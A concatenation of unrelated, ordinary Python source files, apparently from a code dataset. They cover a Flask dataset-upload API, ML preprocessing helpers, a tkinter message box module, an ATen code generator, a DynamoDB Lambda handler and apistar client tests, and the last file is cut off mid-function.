from ..models.dataset import Dataset, DatasetSchema
from .generator import generate_for_model
dataset_route = Blueprint("dataset", __name__)
generate_for_model(dataset_route, Dataset, DatasetSchema)
@dataset_route.route("/upload", methods=["POST"])
def upload_dataset():
# validation
if "dataset" not in request.files:
return jsonify({"status": "dataset is empty"}), 400
# save uploaded files and create MDPDataset
with tempfile.TemporaryDirectory() as dname:
# save file
file = request.files["dataset"]
file_name = werkzeug.utils.secure_filename(file.filename)
file_path = os.path.join(dname, file_name)
file.save(file_path)
# save image files
is_image = request.form.get("is_image") == "true"
if is_image:
# save zip file
zip_file = request.files["zip_file"]
zip_file_name = werkzeug.utils.secure_filename(zip_file.filename)
zip_file_path = os.path.join(dname, zip_file_name)
zip_file.save(zip_file_path)
# decompress zip file
with zipfile.ZipFile(zip_file_path) as zip_fd:
zip_fd.extractall(dname)
# convert uploaded data to MDPDataset
try:
mdp_dataset = import_csv_as_mdp_dataset(file_path, image=is_image)
except ValueError:
return jsonify({"status": "dataset conversion failed."}), 400
# save MDPDataset object.
dataset_name = str(uuid.uuid1()) + ".h5"
dataset_path = os.path.join(get_config("DATASET_DIR"), dataset_name)
mdp_dataset.dump(dataset_path)
# get dataset size
data_size = os.path.getsize(dataset_path)
episode_size = len(mdp_dataset)
step_size = sum(map(len, mdp_dataset))
# compute statistics
stats = mdp_dataset.compute_stats()
stats["observation_shape"] = mdp_dataset.get_observation_shape()
stats["action_size"] = mdp_dataset.get_action_size()
# handle ndarray serialization
stats_json = json.dumps(jsonify(stats).json)
# insert record
dataset = Dataset.create(
file_name,
dataset_name,
episode_size,
step_size,
data_size,
is_image,
mdp_dataset.is_action_discrete(),
stats_json,
)
# return json
return jsonify(DatasetSchema().dump(dataset))
@dataset_route.route("/<dataset_id>/example", methods=["GET"])
def get_example_vector_observation(dataset_id):
dataset = Dataset.get(dataset_id, raise_404=True)
# take care of computational cost
mdp_dataset = dataset.load_mdp_dataset()
if dataset.is_image:
# take first 3 samples
ndarrays = mdp_dataset.observations[:3]
observations = []
for ndarray in ndarrays:
image = convert_ndarray_to_image(ndarray)
# encode image to base64
buffer = BytesIO()
image.save(buffer, format="PNG")
encoded_image = base64.b64encode(buffer.getvalue())
# return in string
observations.append(encoded_image.decode().replace("'", ""))
else:
# take first 100 samples
n_steps = min(100, mdp_dataset.observations.shape[0])
observations = mdp_dataset.observations[:n_steps]
return jsonify({"observations": observations})
|
29714
|
from prefect import task, Flow, Parameter
from prefect.tasks.prefect import StartFlowRun
from prefect.storage import GitHub
with Flow("token-test") as flow:
StartFlowRun(project_name="testing", flow_name="flow_must_fail")()
flow.storage = GitHub(repo="kvnkho/demos", path="/prefect/token_test.py")
flow.register("testing")
|
29725
|
import numpy as np
from scipy import stats
import pandas as pd
from sklearn.cross_decomposition import PLSRegression
def standardize_vector(v, center=True, scale=False):
if center:
v = v - np.mean(v)
if scale:
if np.std(v) == 0:
return v
else:
return (v + 0.0) / np.std(v)
def standardize_vec(v, center='mean', scale='std'):
""""
Standardizes a vector by centering and scaling it
This function will ignore scaling if the scale value is zero and will
instead set the scale value to 1
"""
# choose the center value
if not center:
cent_val = 0.0
elif center == 'mean':
cent_val = np.mean(v)
elif center == 'median':
cent_val = np.median(v)
elif type(center) in [float, int]:
cent_val = center
else:
raise ValueError('improper center value')
# choose the scale value
if not scale:
scale = 1.0
elif scale == 'max':
scale_val = max(v)
elif scale == 'std':
scale_val = np.std(v)
elif scale == 'mean':
scale_val = np.mean(v)
elif scale == 'median':
scale_val = np.median(v)
elif type(scale) in [float, int]:
scale_val = scale
else:
raise ValueError('improper scale value')
# don't scale if scale value is zero
if scale_val == 0:
scale_val = 1
return (v - cent_val + 0.0) / scale_val
def get_PCA(X, scale=False):
"""
Returns the PCA decomposition of data frame X.
Rows of X are observations and columns are features.
Centers columns then performs PCA.
Optionally scales columns by standard deviation
X = U D V^t
Output
------
U, D, V
"""
if type(X) == np.ndarray:
X = pd.DataFrame(X)
# center columns
X_stand = X.apply(lambda c: standardize_vector(c,
center=True, scale=scale))
# do SVD
return np.linalg.svd(X_stand, full_matrices=False)
def get_pls(X, Y, n_comp):
"""
returns the PLS scores
parameters
----------
X: pandas data frame
Y: list
"""
# center and scale both X and y data
x = np.array(X.apply(lambda c: standardize_vector(c, center=True,
scale=True)))
y = standardize_vector(Y, center=True, scale=True)
# compute PLS direcections
pls = PLSRegression(n_components=int(n_comp), scale=True)
pls.fit(x, y)
return np.array(pls.x_scores_), pls.x_loadings_
|
29732
|
import os
import sys
import os.path as osp
from contextlib import contextmanager
############################################################
# Setup path
def add_path(path):
if path not in sys.path:
sys.path.insert(0, path)
curdir = osp.dirname(__file__)
lib_path = osp.join(curdir, '..', 'lib')
add_path(lib_path)
############################################################
# Import modules from the lib
from config import cfg
from utils.ops import may_create
from utils.proto import prototxt_from_template
@contextmanager
def workenv():
olddir = os.getcwd()
os.chdir(osp.join(curdir, '..'))
try:
yield
finally:
os.chdir(olddir)
def setup(phase_key, dataset, expname, rsltname):
'''Setup paths & general args after possible merge from config file.'''
# Save args to config
cfg.DATASET = dataset
cfg.EXP = expname
cfg.NUM_CLASSES = {
'TH14': 20,
'AN': 100,
}[cfg.DATASET]
# AN.train == TH14.val; AN.val == TH14.test
# if cfg.DATASET == 'AN':
# cfg[phase_key].STAGE = {
# 'val': 'train',
# 'test': 'val',
# 'train': 'train',
# 'val': 'val',
# }[cfg[phase_key].STAGE]
# Setup <infix> first, resulting in
# '' => ''; 'infix' => '.infix' so that we can uniformly insert it.
ret_infix = cfg.INFIX if not cfg.INFIX.startswith('.') else cfg.INFIX[1:]
ret_infix = '' if ret_infix == '' else '.{}'.format(ret_infix)
cfg.INFIX = ret_infix
# Setup <viz_folder> name
norm_str = 'normed' if cfg.FEAT.NORM else 'unnormed'
avt_str = {
True: '{avt}',
False: '{avt}{trh}'
}[cfg.FEAT.THRESH is None].format(avt=cfg.FEAT.ACTIVATION,
trh=cfg.FEAT.THRESH)
cfg.VIZ.FOLDER_NAME = '{}_{}_{}_{}'.format(cfg[phase_key].STAGE, cfg.FEAT.MODE,
norm_str, avt_str)
if not cfg.VIZ.FIX_WIDTH:
cfg.VIZ.FOLDER_NAME += '_fixwidth'
# Then several paths: <proto>, <log>, <local_snapshots>, <viz>
cfg.EXP_PATH = osp.join(cfg.EXP_DIR, cfg.DATASET, cfg.EXP)
cfg.PROTO_PATH = osp.join(cfg.EXP_PATH, 'proto')
cfg.LOG_PATH = osp.join(cfg.EXP_PATH, 'log')
cfg.LOCAL_SNAPSHOT_PATH = osp.join(cfg.EXP_PATH, 'snapshot')
# Example: exp/TH14/experiment100/val_mul_normed_relu10_fixwidth
cfg.VIZ_PATH = osp.join(cfg.EXP_PATH, cfg.VIZ.FOLDER_NAME)
cfg.RSLT_PATH = osp.join(cfg.EXP_PATH, 'rslt')
path2check = [cfg.PROTO_PATH, cfg.LOG_PATH, cfg.LOCAL_SNAPSHOT_PATH,
cfg.VIZ_PATH, cfg.RSLT_PATH]
map(may_create, path2check)
cfg.SL_PATH = osp.join(cfg.PROTO_PATH,
'solver{}.prototxt'.format(cfg.INFIX))
cfg.TR_PATH = osp.join(cfg.PROTO_PATH,
'train{}.prototxt'.format(cfg.INFIX))
# Currently we share the prototxt between training and testing.
cfg.TE_PATH = cfg.TR_PATH
cfg.SNAPSHOT_PATH = osp.join(cfg.LOCAL_SNAPSHOT_PATH, {
True: rsltname.replace('.pc', '.caffemodel'),
False: '{}_iter{}.caffemodel'.format(rsltname, cfg.MAX_ITER)
}[rsltname.endswith('.pc')])
# Setup `videoids_lst` template.
cfg.DSPEC.VID_LST = osp.join(cfg.DATA_DIR, cfg.DATASET, '{stage}_videoid.lst')
# Specify training input.
cfg[phase_key].DATA_PATH = osp.join(cfg.DATA_DIR, cfg.DATASET,
cfg[phase_key].DATA_FILE)
phase_ = phase_key.lower() + '.'
# Processing rsltname in following logic in order:
# (1) rsltname should start with '<phase>.';
# (2) rslname with '.pc' should be directly used;
# (3) otherwise it should be recorded with the iteration.
if not rsltname.startswith(phase_):
rsltname = phase_ + rsltname
# Finally the result pickle file.
cfg[phase_key].RSLT_PATH = osp.join(cfg.RSLT_PATH, {
True: rsltname,
False: '{}_iter{}.pc'.format(rsltname, cfg.MAX_ITER)
}[rsltname.endswith('.pc')])
# Generate prototxt from template
prototxt_from_template()
|
29750
|
from tkinter.commondialog import Dialog
ERROR = 'error'
INFO = 'info'
QUESTION = 'question'
WARNING = 'warning'
ABORTRETRYIGNORE = 'abortretryignore'
OK = 'ok'
OKCANCEL = 'okcancel'
RETRYCANCEL = 'retrycancel'
YESNO = 'yesno'
YESNOCANCEL = 'yesnocancel'
ABORT = 'abort'
RETRY = 'retry'
IGNORE = 'ignore'
OK = 'ok'
CANCEL = 'cancel'
YES = 'yes'
NO = 'no'
class Message(Dialog):
"""A message box"""
command = 'tk_messageBox'
def _show(title=None, message=None, _icon=None, _type=None, **options):
if _icon and 'icon' not in options:
options['icon'] = _icon
if _type and 'type' not in options:
options['type'] = _type
if title:
options['title'] = title
if message:
options['message'] = message
res = Message(**options).show()
if isinstance(res, bool):
if res:
return YES
return NO
return str(res)
def showinfo(title=None, message=None, **options):
"""Show an info message"""
return _show(title, message, INFO, OK, **options)
def showwarning(title=None, message=None, **options):
"""Show a warning message"""
return _show(title, message, WARNING, OK, **options)
def showerror(title=None, message=None, **options):
"""Show an error message"""
return _show(title, message, ERROR, OK, **options)
def askquestion(title=None, message=None, **options):
"""Ask a question"""
return _show(title, message, QUESTION, YESNO, **options)
def askokcancel(title=None, message=None, **options):
"""Ask if operation should proceed; return true if the answer is ok"""
s = _show(title, message, QUESTION, OKCANCEL, **options)
return s == OK
def askyesno(title=None, message=None, **options):
"""Ask a question; return true if the answer is yes"""
s = _show(title, message, QUESTION, YESNO, **options)
return s == YES
def askyesnocancel(title=None, message=None, **options):
"""Ask a question; return true if the answer is yes, None if cancelled."""
s = _show(title, message, QUESTION, YESNOCANCEL, **options)
s = str(s)
if s == CANCEL:
return None
return s == YES
def askretrycancel(title=None, message=None, **options):
"""Ask if operation should be retried; return true if the answer is yes"""
s = _show(title, message, WARNING, RETRYCANCEL, **options)
return s == RETRY
if __name__ == '__main__':
print('info', showinfo('Spam', 'Egg Information'))
print('warning', showwarning('Spam', 'Egg Warning'))
print('error', showerror('Spam', 'Egg Alert'))
print('question', askquestion('Spam', 'Question?'))
print('proceed', askokcancel('Spam', 'Proceed?'))
print('yes/no', askyesno('Spam', 'Got it?'))
print('yes/no/cancel', askyesnocancel('Spam', 'Want it?'))
print('try again', askretrycancel('Spam', 'Try again?'))
|
29760
|
from django.conf.urls.defaults import patterns, include, url
from django.contrib import admin
from board.feeds import EventFeed
from board.views import IndexView, ServiceView
admin.autodiscover()
urlpatterns = patterns('',
url(r'^$', IndexView.as_view(), name='index'),
url(r'^services/(?P<slug>[-\w]+)$', ServiceView.as_view(), name='service'),
url(r'^feed$', EventFeed(), name='feed'),
url(r'^admin/', include(admin.site.urls)),
)
|
29767
|
from __future__ import (
annotations,
)
import logging
import warnings
from pathlib import (
Path,
)
from typing import (
TYPE_CHECKING,
Optional,
Type,
TypeVar,
Union,
)
from .object import (
Object,
)
if TYPE_CHECKING:
from .config import (
Config,
)
logger = logging.getLogger(__name__)
S = TypeVar("S", bound="SetupMixin")
class SetupMixin(Object):
"""Setup Mixin class."""
def __init__(self, *args, already_setup: bool = False, **kwargs):
super().__init__(**kwargs)
self._already_setup = already_setup
@property
def already_setup(self) -> bool:
"""Already Setup getter.
:return: A boolean value.
"""
return self._already_setup
@property
def already_destroyed(self) -> bool:
"""Already Destroy getter.
:return: A boolean value.
"""
return not self._already_setup
@classmethod
def from_config(cls: Type[S], config: Optional[Union[Config, Path]] = None, **kwargs) -> S:
"""Build a new instance from config.
:param config: Config instance. If `None` is provided, default config is chosen.
:param kwargs: Additional named arguments.
:return: A instance of the called class.
"""
if isinstance(config, Path):
from .config import (
Config,
)
config = Config(config)
if config is None:
from .config import (
Config,
)
from .injections import (
Inject,
)
config = Inject.resolve(Config)
logger.info(f"Building a {cls.__name__!r} instance from config...")
return cls._from_config(config=config, **kwargs)
@classmethod
def _from_config(cls: Type[S], config: Config, **kwargs) -> S:
return cls(**kwargs)
async def __aenter__(self: S) -> S:
await self.setup()
return self
async def setup(self) -> None:
"""Setup miscellaneous repository things.
:return: This method does not return anything.
"""
if not self._already_setup:
logger.debug(f"Setting up a {type(self).__name__!r} instance...")
await self._setup()
self._already_setup = True
async def _setup(self) -> None:
return
async def __aexit__(self, exc_type, exc_value, exc_traceback):
await self.destroy()
async def destroy(self) -> None:
"""Destroy miscellaneous repository things.
:return: This method does not return anything.
"""
if self._already_setup:
logger.debug(f"Destroying a {type(self).__name__!r} instance...")
await self._destroy()
self._already_setup = False
async def _destroy(self) -> None:
"""Destroy miscellaneous repository things."""
def __del__(self):
if not getattr(self, "already_destroyed", True):
warnings.warn(
f"A not destroyed {type(self).__name__!r} instance is trying to be deleted...", ResourceWarning
)
class MinosSetup(SetupMixin):
"""Minos Setup class."""
def __init__(self, *args, **kwargs):
warnings.warn(f"{MinosSetup!r} has been deprecated. Use {SetupMixin} instead.", DeprecationWarning)
super().__init__(*args, **kwargs)
|
29769
|
from optparse import OptionParser
import yaml
import cwrap_parser
import nn_parse
import native_parse
import preprocess_declarations
import function_wrapper
import dispatch_macros
import copy_wrapper
from code_template import CodeTemplate
parser = OptionParser()
parser.add_option('-s', '--source-path', help='path to source director for tensorlib',
action='store', default='.')
parser.add_option('-o', '--output-dependencies',
help='only output a list of dependencies', action='store')
parser.add_option('-n', '--no-cuda', action='store_true')
options, files = parser.parse_args()
if options.output_dependencies is not None:
output_dependencies_file = open(options.output_dependencies, 'w')
TEMPLATE_PATH = options.source_path + "/templates"
GENERATOR_DERIVED = CodeTemplate.from_file(
TEMPLATE_PATH + "/GeneratorDerived.h")
STORAGE_DERIVED_CPP = CodeTemplate.from_file(
TEMPLATE_PATH + "/StorageDerived.cpp")
STORAGE_DERIVED_H = CodeTemplate.from_file(TEMPLATE_PATH + "/StorageDerived.h")
TYPE_DERIVED_CPP = CodeTemplate.from_file(TEMPLATE_PATH + "/TypeDerived.cpp")
TYPE_DERIVED_H = CodeTemplate.from_file(TEMPLATE_PATH + "/TypeDerived.h")
TYPE_H = CodeTemplate.from_file(TEMPLATE_PATH + "/Type.h")
TYPE_CPP = CodeTemplate.from_file(TEMPLATE_PATH + "/Type.cpp")
TENSOR_DERIVED_CPP = CodeTemplate.from_file(
TEMPLATE_PATH + "/TensorDerived.cpp")
TENSOR_SPARSE_CPP = CodeTemplate.from_file(
TEMPLATE_PATH + "/TensorSparse.cpp")
TENSOR_DENSE_CPP = CodeTemplate.from_file(
TEMPLATE_PATH + "/TensorDense.cpp")
TENSOR_DERIVED_H = CodeTemplate.from_file(TEMPLATE_PATH + "/TensorDerived.h")
TENSOR_H = CodeTemplate.from_file(TEMPLATE_PATH + "/Tensor.h")
TENSOR_METHODS_H = CodeTemplate.from_file(TEMPLATE_PATH + "/TensorMethods.h")
FUNCTIONS_H = CodeTemplate.from_file(TEMPLATE_PATH + "/Functions.h")
NATIVE_FUNCTIONS_PATH = options.source_path + "/NativeFunctions.h"
generators = {
'CPUGenerator.h': {
'name': 'CPU',
'th_generator': 'THGenerator * generator;',
'header': 'TH/TH.h',
},
'CUDAGenerator.h': {
'name': 'CUDA',
'th_generator': '',
'header': 'THC/THC.h'
},
}
backends = ['CPU']
if not options.no_cuda:
backends.append('CUDA')
densities = ['Dense', 'Sparse']
scalar_types = [
('Byte', 'uint8_t', 'Long', 'uint8_t'),
('Char', 'int8_t', 'Long', 'int8_t'),
('Double', 'double', 'Double', 'double'),
('Float', 'float', 'Double', 'float'),
('Int', 'int', 'Long', 'int32_t'),
('Long', 'int64_t', 'Long', 'int64_t'),
('Short', 'int16_t', 'Long', 'int16_t'),
('Half', 'Half', 'Double', 'THHalf'),
]
# shared environment for non-derived base classes Type.h Tensor.h Storage.h
top_env = {
'type_registrations': [],
'type_headers': [],
'type_method_declarations': [],
'type_method_definitions': [],
'type_method_inline_definitions': [],
'tensor_method_declarations': [],
'tensor_method_definitions': [],
'function_declarations': [],
'function_definitions': [],
'type_ids': [],
}
def write(filename, s):
filename = "ATen/" + filename
if options.output_dependencies is not None:
output_dependencies_file.write(filename + ";")
return
with open(filename, "w") as f:
f.write(s)
def format_yaml(data):
if options.output_dependencies:
# yaml formatting is slow so don't do it if we will ditch it.
return ""
noalias_dumper = yaml.dumper.SafeDumper
noalias_dumper.ignore_aliases = lambda self, data: True
return yaml.dump(data, default_flow_style=False, Dumper=noalias_dumper)
def generate_storage_type_and_tensor(backend, density, scalar_type, declarations):
scalar_name, c_type, accreal, th_scalar_type = scalar_type
env = {}
density_tag = 'Sparse' if density == 'Sparse' else ''
th_density_tag = 'S' if density == 'Sparse' else ''
env['Density'] = density
env['ScalarName'] = scalar_name
env['ScalarType'] = c_type
env['THScalarType'] = th_scalar_type
env['AccScalarName'] = accreal
env['Storage'] = "{}{}Storage".format(backend, scalar_name)
env['Type'] = "{}{}{}Type".format(density_tag, backend, scalar_name)
env['Tensor'] = "{}{}{}Tensor".format(density_tag, backend, scalar_name)
env['SparseTensor'] = "Sparse{}{}Tensor".format(backend, scalar_name)
env['Backend'] = density_tag + backend
# used for generating switch logic for external functions
tag = density_tag + backend + scalar_name
env['TypeID'] = 'TypeID::' + tag
top_env['type_ids'].append(tag + ',')
if backend == 'CUDA':
env['th_headers'] = ['#include <THC/THC.h>',
'#include <THCUNN/THCUNN.h>',
'#undef THNN_',
'#undef THCIndexTensor_']
# if density == 'Sparse':
env['th_headers'] += ['#include <THCS/THCS.h>',
'#undef THCIndexTensor_']
sname = '' if scalar_name == "Float" else scalar_name
env['THType'] = 'Cuda{}'.format(sname)
env['THStorage'] = 'THCuda{}Storage'.format(sname)
if density == 'Dense':
env['THTensor'] = 'THCuda{}Tensor'.format(sname)
else:
env['THTensor'] = 'THCS{}Tensor'.format(scalar_name)
env['THIndexTensor'] = 'THCudaLongTensor'
env['state'] = ['context->thc_state']
env['isCUDA'] = 'true'
env['storage_device'] = 'return storage->device;'
env['Generator'] = 'CUDAGenerator'
else:
env['th_headers'] = ['#include <TH/TH.h>',
'#include <THNN/THNN.h>',
'#undef THNN_']
# if density == 'Sparse':
env['th_headers'].append('#include <THS/THS.h>')
env['THType'] = scalar_name
env['THStorage'] = "TH{}Storage".format(scalar_name)
env['THTensor'] = 'TH{}{}Tensor'.format(th_density_tag, scalar_name)
env['THIndexTensor'] = 'THLongTensor'
env['state'] = []
env['isCUDA'] = 'false'
env['storage_device'] = 'throw std::runtime_error("CPU storage has no device");'
env['Generator'] = 'CPUGenerator'
env['AS_REAL'] = env['ScalarType']
if scalar_name == "Half":
env['SparseTensor'] = 'Tensor'
if backend == "CUDA":
env['to_th_type'] = 'HalfFix<__half,Half>'
env['to_at_type'] = 'HalfFix<Half,__half>'
env['AS_REAL'] = 'convert<half,double>'
env['THScalarType'] = 'half'
else:
env['to_th_type'] = 'HalfFix<THHalf,Half>'
env['to_at_type'] = 'HalfFix<Half,THHalf>'
elif scalar_name == 'Long':
env['to_th_type'] = 'long'
env['to_at_type'] = 'int64_t'
else:
env['to_th_type'] = ''
env['to_at_type'] = ''
declarations, definitions = function_wrapper.create_derived(
env, declarations)
env['type_derived_method_declarations'] = declarations
env['type_derived_method_definitions'] = definitions
if density != 'Sparse':
# there are no special storage types for Sparse, they are composed
# of Dense tensors
write(env['Storage'] + ".cpp", STORAGE_DERIVED_CPP.substitute(env))
write(env['Storage'] + ".h", STORAGE_DERIVED_H.substitute(env))
env['TensorDenseOrSparse'] = TENSOR_DENSE_CPP.substitute(env)
env['THTensor_nDimension'] = 'tensor->nDimension'
else:
env['TensorDenseOrSparse'] = TENSOR_SPARSE_CPP.substitute(env)
env['THTensor_nDimension'] = 'tensor->nDimensionI + tensor->nDimensionV'
write(env['Type'] + ".cpp", TYPE_DERIVED_CPP.substitute(env))
write(env['Type'] + ".h", TYPE_DERIVED_H.substitute(env))
write(env['Tensor'] + ".cpp", TENSOR_DERIVED_CPP.substitute(env))
write(env['Tensor'] + ".h", TENSOR_DERIVED_H.substitute(env))
type_register = (('context->type_registry[static_cast<int>(Backend::{})]' +
'[static_cast<int>(ScalarType::{})].reset(new {}(context));')
.format(env['Backend'], scalar_name, env['Type']))
top_env['type_registrations'].append(type_register)
top_env['type_headers'].append(
'#include "ATen/{}.h"'.format(env['Type']))
return env
cwrap_files = [f for f in files if f.endswith('.cwrap')]
nn_files = [f for f in files if f.endswith('.yaml') or f.endswith('.h')]
declarations = [d
for file in cwrap_files
for d in cwrap_parser.parse(file)]
print(nn_files)
declarations += nn_parse.run(nn_files)
declarations += native_parse.parse(NATIVE_FUNCTIONS_PATH)
declarations = preprocess_declarations.run(declarations)
for fname, env in generators.items():
write(fname, GENERATOR_DERIVED.substitute(env))
# note: this will fill in top_env['type/tensor_method_declarations/definitions']
# and modify the declarations to include any information that will all_backends
# be used by function_wrapper.create_derived
output_declarations = function_wrapper.create_generic(top_env, declarations)
write("Declarations.yaml", format_yaml(output_declarations))
# populated by generate_storage_type_and_tensor
all_types = []
for backend in backends:
for density in densities:
for scalar_type in scalar_types:
if density == 'Sparse' and scalar_type[0] == 'Half':
# THS does not do half type yet.
continue
all_types.append(generate_storage_type_and_tensor(
backend, density, scalar_type, declarations))
write('Type.h', TYPE_H.substitute(top_env))
write('Type.cpp', TYPE_CPP.substitute(top_env))
write('Tensor.h', TENSOR_H.substitute(top_env))
write('TensorMethods.h', TENSOR_METHODS_H.substitute(top_env))
write('Functions.h', FUNCTIONS_H.substitute(top_env))
write('Dispatch.h', dispatch_macros.create(all_types))
write('Copy.cpp', copy_wrapper.create(all_types))
if options.output_dependencies is not None:
output_dependencies_file.close()
|
29815
|
from configargparse import ArgParser
from PIL import Image
import logging
import numpy as np
import os
def transform_and_save(img_arr, output_filename):
"""
Takes an image and optionally transforms it and then writes it out to output_filename
"""
img = Image.fromarray(img_arr)
img.save(output_filename)
class Ingest(object):
def __init__(self, input_dir, out_dir, target_size=96, skipimg=False):
np.random.seed(0)
self.skipimg = skipimg
self.out_dir = out_dir
self.input_dir = input_dir
self.manifests = dict()
for setn in ('train', 'val'):
self.manifests[setn] = os.path.join(self.out_dir, '{}-index.csv'.format(setn))
self.target_size = target_size
self.trainpairlist = {}
self.valpairlist = {}
self.labels = range(10)
if not os.path.exists(self.out_dir):
os.mkdir(self.out_dir)
self.outimgdir = os.path.join(self.out_dir, 'images')
if not os.path.exists(self.outimgdir):
os.mkdir(self.outimgdir)
os.mkdir(os.path.join(self.outimgdir, 'train'))
os.mkdir(os.path.join(self.outimgdir, 'val'))
self.outlabeldir = os.path.join(self.out_dir, 'labels')
if not os.path.exists(self.outlabeldir):
os.mkdir(self.outlabeldir)
def collectdata(self,):
print 'Start Collect Data...'
train_x_path = os.path.join(self.input_dir, 'train_X.bin')
train_y_path = os.path.join(self.input_dir, 'train_y.bin')
test_x_path = os.path.join(self.input_dir, 'test_X.bin')
test_y_path = os.path.join(self.input_dir, 'test_y.bin')
train_xf = open(train_x_path, 'rb')
train_x = np.fromfile(train_xf, dtype=np.uint8)
train_x = np.reshape(train_x, (-1, 3, 96, 96))
train_x = np.transpose(train_x, (0, 3, 2, 1))
train_yf = open(train_y_path, 'rb')
train_y = np.fromfile(train_yf, dtype=np.uint8)
test_xf = open(test_x_path, 'rb')
test_x = np.fromfile(test_xf, dtype=np.uint8)
test_x = np.reshape(test_x, (-1, 3, 96, 96))
test_x = np.transpose(test_x, (0, 3, 2, 1))
test_yf = open(test_y_path, 'rb')
test_y = np.fromfile(test_yf, dtype=np.uint8)
idx = np.zeros(10, dtype=np.int)
for i in xrange(train_x.shape[0]):
outdir = os.path.join(self.outimgdir, 'train', str(train_y[i]-1))
if not os.path.exists(outdir):
os.mkdir(outdir)
if not self.skipimg:
transform_and_save(img_arr=train_x[i], output_filename=os.path.join(outdir, str(idx[train_y[i]-1]) + '.jpg'))
self.trainpairlist[os.path.join('images', 'train', str(train_y[i]-1), str(idx[train_y[i]-1]) + '.jpg')] = \
os.path.join('labels', str(train_y[i] - 1) + '.txt')
idx[train_y[i]-1] += 1
idx = np.zeros(10, dtype=np.int)
for i in xrange(test_x.shape[0]):
outdir = os.path.join(self.outimgdir, 'val', str(test_y[i]-1))
if not os.path.exists(outdir):
os.mkdir(outdir)
if not self.skipimg:
transform_and_save(img_arr=test_x[i],
output_filename=os.path.join(outdir, str(idx[test_y[i]-1]) + '.jpg'))
self.valpairlist[os.path.join('images', 'val', str(test_y[i]-1), str(idx[test_y[i]-1]) + '.jpg')] = \
os.path.join('labels', str(test_y[i] - 1) + '.txt')
idx[test_y[i]-1] += 1
print 'Finished Collect Data...'
def write_label(self, ):
for i, l in enumerate(self.labels):
sdir = os.path.join(self.outlabeldir, str(i) + '.txt')
np.savetxt(sdir, [l], '%d')
def run(self):
"""
resize images then write manifest files to disk.
"""
self.write_label()
self.collectdata()
records = [(fname, tgt)
for fname, tgt in self.trainpairlist.items()]
np.savetxt(self.manifests['train'], records, fmt='%s,%s')
records = [(fname, tgt)
for fname, tgt in self.valpairlist.items()]
np.savetxt(self.manifests['val'], records, fmt='%s,%s')
class IngestUnlabeled(object):
def __init__(self, input_dir, out_dir, target_size=96, skipimg=False):
np.random.seed(0)
self.skipimg = skipimg
self.out_dir = out_dir
self.input_dir = input_dir
self.manifests = dict()
self.manifests = os.path.join(self.out_dir, 'unlabeled-index.csv')
self.target_size = target_size
self.trainpairlist = {}
if not os.path.exists(self.out_dir):
os.mkdir(self.out_dir)
self.outimgdir = os.path.join(self.out_dir, 'images')
if not os.path.exists(self.outimgdir):
os.mkdir(self.outimgdir)
self.unlabeldir = os.path.join(self.outimgdir, 'unlabeled')
if not os.path.exists(self.unlabeldir):
os.mkdir(self.unlabeldir)
def collectdata(self,):
print 'Start Collect Data...'
train_x_path = os.path.join(self.input_dir, 'unlabeled_X.bin')
train_xf = open(train_x_path, 'rb')
train_x = np.fromfile(train_xf, dtype=np.uint8)
train_x = np.reshape(train_x, (-1, 3, 96, 96))
train_x = np.transpose(train_x, (0, 3, 2, 1))
idx = 0
for i in xrange(train_x.shape[0]):
if not self.skipimg:
transform_and_save(img_arr=train_x[i], output_filename=os.path.join(self.unlabeldir, str(idx) + '.jpg'))
self.trainpairlist[os.path.join('images', 'unlabeled', str(idx) + '.jpg')] = 'labels/11.txt'
idx += 1
print 'Finished Collect Data...'
def write_label(self, ):
sdir = os.path.join(self.out_dir, 'labels', '11.txt')
np.savetxt(sdir, [11], '%d')
def run(self):
"""
resize images then write manifest files to disk.
"""
self.write_label()
self.collectdata()
records = [(fname, tgt)
for fname, tgt in self.trainpairlist.items()]
np.savetxt(self.manifests, records, fmt='%s,%s')
if __name__ == "__main__":
parser = ArgParser()
parser.add_argument('--input_dir', help='Directory to find input',
default='/hdd/Dataset/STL10')
parser.add_argument('--out_dir', help='Directory to write ingested files',
default='/home/william/PyProjects/TFcodes/dataset/stl10')
parser.add_argument('--target_size', type=int, default=96,
help='Size in pixels to scale shortest side DOWN to (0 means no scaling)')
parser.add_argument('--skipImg', type=bool, default=False,
help='True to skip processing and copying images')
args = parser.parse_args()
logger = logging.getLogger(__name__)
bw = Ingest(input_dir=args.input_dir, out_dir=args.out_dir, target_size=args.target_size, skipimg=args.skipImg)
# bw = IngestUnlabeled(input_dir=args.input_dir, out_dir=args.out_dir, target_size=args.target_size, skipimg=args.skipImg)
bw.run()
|
29816
|
import os
import json
import boto3
def handler(event, context):
table = os.environ.get('table')
dynamodb = boto3.client('dynamodb')
item = {
"name":{'S':event["queryStringParameters"]["name"]},
"location":{'S':event["queryStringParameters"]["location"]},
"age":{'S':event["queryStringParameters"]["age"]}
}
response = dynamodb.put_item(TableName=table,
Item=item
)
message = 'Status of the write to DynamoDB {}!'.format(response)
return {
"statusCode": 200,
"body": json.dumps(message)
}
|
29825
|
import os
from starlette.applications import Starlette
from starlette.responses import PlainTextResponse, Response
from starlette.testclient import TestClient
from apistar.client import Client, decoders
app = Starlette()
@app.route("/text-response/")
def text_response(request):
return PlainTextResponse("hello, world")
@app.route("/file-response/")
def file_response(request):
headers = {
"Content-Type": "image/png",
"Content-Disposition": 'attachment; filename="filename.png"',
}
return Response(b"<somedata>", headers=headers)
@app.route("/file-response-url-filename/name.png")
def file_response_url_filename(request):
headers = {"Content-Type": "image/png", "Content-Disposition": "attachment"}
return Response(b"<somedata>", headers=headers)
@app.route("/file-response-no-extension/name")
def file_response_no_extension(request):
headers = {"Content-Type": "image/png", "Content-Disposition": "attachment"}
return Response(b"<somedata>", headers=headers)
@app.route("/")
def file_response_no_name(request):
headers = {"Content-Type": "image/png", "Content-Disposition": "attachment"}
return Response(b"<somedata>", headers=headers)
schema = {
"openapi": "3.0.0",
"info": {"title": "Test API", "version": "1.0"},
"servers": [{"url": "http://testserver"}],
"paths": {
"/text-response/": {"get": {"operationId": "text-response"}},
"/file-response/": {"get": {"operationId": "file-response"}},
"/file-response-url-filename/name.png": {
"get": {"operationId": "file-response-url-filename"}
},
"/file-response-no-extension/name": {
"get": {"operationId": "file-response-no-extension"}
},
"/": {"get": {"operationId": "file-response-no-name"}},
},
}
def test_text_response():
client = Client(schema, session=TestClient(app))
data = client.request("text-response")
assert data == "hello, world"
def test_file_response():
client = Client(schema, session=TestClient(app))
data = client.request("file-response")
assert os.path.basename(data.name) == "filename.png"
assert data.read() == b"<somedata>"
def test_file_response_url_filename():
client = Client(schema, session=TestClient(app))
data = client.request("file-response-url-filename")
assert os.path.basename(data.name) == "name.png"
assert data.read() == b"<somedata>"
def test_file_response_no_extension():
